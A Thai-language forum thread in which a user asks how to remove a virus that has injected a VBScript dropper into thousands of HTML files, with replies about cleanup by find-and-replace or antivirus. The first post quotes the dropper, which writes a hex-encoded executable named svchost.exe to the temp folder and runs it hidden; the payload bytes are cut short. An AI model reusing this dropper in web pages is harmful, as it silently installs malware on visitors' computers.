adman โพสต์ 2011-5-15 23:22:45

How to del. this script [Help me please]

on *.htm *.html

</html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003................................................."   :'(<<== sample
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

adman โพสต์ 2011-5-16 00:57:45

พอจะหาทางออกได้แล้วครับ...แต่อาจจะมีวิธีอื่นที่ดีกว่า

ปัญหาของผมก็คือ ไฟล์ติดไวรัส ค่อนข้างจะอันตรายมากทีเดียว
เพราะทุกไฟล์ที่เป็น *.html กับ *.htm
จะถูกฝังโค้ดนี้<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"ซึ่งมีประมาณ สองเหมือนตัวอีกษรได้ แต่ผมยกตัวอย่างมาแค่นี้

สคริปตัวนี้มันจะทำงานยังไง ?
ก็คือว่า จะสั่งให้ svchost.exe ค้นหาไฟล์ *.html *.htm แล้วฝังโค้ตลงไป ต่อท้าย </html>
ซึ่งจะส่งผลให้ขนาดไฟล์ใหญ่ขึ้น จากปกติ 1kb ก็จะเพิ่มเป็น 123kb โดยประมาณ
ทุก ๆ 5 นาทีจะเพิ่มขึ้น 2 เท่าไปเรื่อย ๆ .....สุดท้าย ฮาร์ดดิสค์ก็จะเต็ม แดงเถือกโดยไม่รู้ตัว
CPU ก็จะทำงานหนักตลอดเวลา ส่วน Ram ไม่ต้องห่วง เครื่องคุณมีเท่าไหร่ เต็มหลอดทันที

ดูเหมือนจะไม่หนัก แต่ปัญหาอีกอย่างคือ โปรแกรมสแกนไวรัสแทบทุกตัว จะทำการลบไฟล์นี้ทิ้ง ซะงั้น
ซึ่งจริง ๆ ผมไม่ต้องการให้เป็นอย่างนั้น เพราะจะทำให้ไฟล์เสียไปด้วย
ผมต้องการแค่ลบ โค้ดนี้ออกเท่านั้น....

วิธีแก้ปัญหาเท่าที่คิดได้ตอนนี้
1. เปิดไฟล์ *.html ทีละตัวแล้วนั่งลบโค้ด
    ถ้ามีประมาณ 10,000 ไฟล์ ก็จบกันพอดี

2. ใช้โปรแกรม notepad++
    อันนี้พอช่วยได้ ใช้คำสั่ง replace in file
    แต่คำได้แค่ทีละนิด

3. ใช้ Ultraedit
    วิธีการเดียวกับ notepad++
    แต่ข้อดีคือ replace infile * ได้ครั้งละ 2,000 ตัวอักษร

ก็ถือว่าค่อนข้างดีขึ้นมาหน่อย
โค้ดไวรัสที่ผมโดนเข้าไปมีประมาณ 20,000 ตัวอักษร สรุปต้องทำประมาณ 10 ครั้ง


* replace infile   : คือการค้นหาโค้ด และแทนที่ โดยไม่ต้องเปิดไฟล์
   สามารถค้นหาได้ถึง subfolder

ท่านใดมีทางอื่น แนะนำช่วยด้วยนะครับ

jaideejung007 โพสต์ 2011-5-16 08:14:50

ลบออกทั้งหมดเหอะครับพี่ หากมันแพร่กระจายไปได้ขนาดนั้น

ถึงเราจะลบออกได้ แต่ก็อาจจะยังหลงเหลืออยู่(ซักไฟล์ล่ะน่า)

adman โพสต์ 2011-5-17 18:02:03

พอมีวิธีอื่นไหม
ตอนนี้ไปเจอโปรแกรม Kis 2012 ยังเป็น Beta
รุ้สึกว่าจะทำงานได้ดีกว่า เพราะมันจะลบโค้ดนั้นให้ แต่ไม่ลบไฟล์
แค่สั่ง scan เท่านั้น ไม่รู้จะดีไหม กำลังลองดู
หน้า: [1]
ดูในรูปแบบกติ: How to del. this script [Help me please]